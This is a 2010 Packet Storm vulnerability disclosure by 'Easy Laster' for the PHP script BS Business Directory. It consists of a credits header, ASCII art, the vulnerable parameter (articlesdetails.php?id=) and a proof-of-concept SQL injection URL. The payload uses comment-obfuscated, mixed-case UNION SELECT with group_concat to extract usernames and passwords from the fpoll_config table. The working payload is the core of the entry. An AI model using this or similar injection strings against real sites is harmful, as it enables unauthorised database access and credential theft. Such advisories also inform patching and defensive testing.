BS Business Directory SQL Injection

2010-07-06T00:00:00
ID PACKETSTORM:91515
Type packetstorm
Reporter Easy Laster
Modified 2010-07-06T00:00:00

Description

                                        
                                            `----------------------------Information------------------------------------------------  
+Autor : Easy Laster  
+ICQ : 11-051-551  
+Date : 06.07.2010  
+Script : BS Business Directory  
+Price : $24.95  
+Language :PHP  
+Discovered by Easy Laster 4004-security-project.com  
+Security Group Undergroundagents and 4004-Security-Project 4004-security-project.com  
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,  
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,  
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco.  
---------------------------------------------------------------------------------------  
  
___ ___ ___ ___ _ _ _____ _ _  
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_  
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|  
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|  
|___| |___|   
  
  
----------------------------------------------------------------------------------------  
+Vulnerability : www.site.com/Business_Directory/articlesdetails.php?id=  
----------------------------------------------------------------------------------------  
+Proof of Concept : www.site.com/Business_Directory/articlesdetails.php?id=%27/**/+  
uNiOn+/**/sEleCt+/**/1,2,gRoUp_cOnCat%28user,0x3a,pass%29+/**/fRoM+/**/fpoll_config--+  
----------------------------------------------------------------------------------------  
  
`